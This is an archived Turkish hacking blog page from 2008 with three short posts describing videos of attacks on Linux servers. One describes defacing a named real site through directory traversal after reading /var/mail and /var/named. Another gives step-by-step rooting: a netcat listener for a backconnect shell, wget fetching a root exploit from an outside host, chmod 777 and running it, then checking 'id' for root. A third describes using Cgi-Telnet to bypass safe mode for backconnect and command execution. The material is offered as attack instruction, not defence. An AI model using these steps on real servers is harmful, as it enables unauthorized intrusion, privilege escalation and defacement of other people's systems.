You are currently browsing the archives for the Linux category.
Ağustos 12th, 2008 SecurityLab Posted in Linux, Video Arşivi No Comments »
Linux Server Hack ediliş videosu. Yetki kısıtlaması olmayan linux serverlarda dizin atlayarak (bypass edilerek) flashhaber.com.tr’nin yazılabilir bir dizinine index dosyası yazdırılıyor. Videoda /var/mail dizininden username alındıktan sonra o kullanıcı adının hangi domaine ait olduğunu öğrenmek için /var/named dizininden alınıyor sonuç olarak amaca ulaşılıyor.
Ağustos 9th, 2008 SecurityLab Posted in Linux, Video Arşivi No Comments »
Linux Server Root işlemi yaparken kernele uygun exploit, backconnect tool’lar, netcat ve servera bağlanmak için açık bir porta ihtiyacınız vardır. System32 ye atılmışsa netcat dosyaları msdos’a girip nc -vv -l -p [port] yazmanız yeterli. Eğer System32 ye kopyalanmamışsa netcat pc de bulundugu dizine gidilmeli msdos tan sonra server a bağlanmak için komut yazılmalı. Server’a bağlandıktan sonra yazılabilir bir dizine wget fetch curl GET vs komutlarla exploitimizi çekeriz. ( wget http://www.lmfrf.org/rootexploit ) daha sonra full yetki vermemiz gerek server’a çektiğimiz exploite (chmod 777 rootexploit). yaptıktan sonra geriye exploiti çalıştırmak kalıyor. ./rootexploit <—–<< ßu i$lem ßiraz uzun sürebilir, bazende çalışmayabilir her server rootlanır diye birşey yoktur rootlanmayacak serverda yoktur. Sıra kontrol etmeye geldi “id” komutunu kullanarak serverdaki yetkimize bakarız “uid=0(root) gid=0(root) groups=0(root)” gibiyse yetkiniz root olmuşsunuzdur yok değilse işlem başarısız olmuştur.
Ağustos 7th, 2008 SecurityLab Posted in Linux, Video Arşivi No Comments »
Cgi-Telnet ile Safe Mode On (Güvenlik Modu : Açık) Linux Server’ın Güvenliğini aşıp izni olmayan dizinler listeleniyor. Bypass ile Backconnect, Execute Command mümkün kılınıyor.
